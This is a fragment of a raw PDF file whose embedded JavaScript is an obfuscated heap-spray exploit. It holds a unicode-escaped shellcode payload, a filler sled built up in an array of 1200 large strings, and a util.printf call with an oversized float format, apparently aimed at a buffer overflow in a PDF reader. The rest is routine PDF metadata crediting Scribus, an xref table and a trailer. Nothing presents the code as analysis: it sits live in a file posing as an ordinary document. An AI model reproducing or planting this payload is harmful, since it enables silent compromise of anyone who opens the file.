"%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5" +
"%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4" +
"%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5" +
"%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2" +
"%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125" +
"%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233" +
"%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF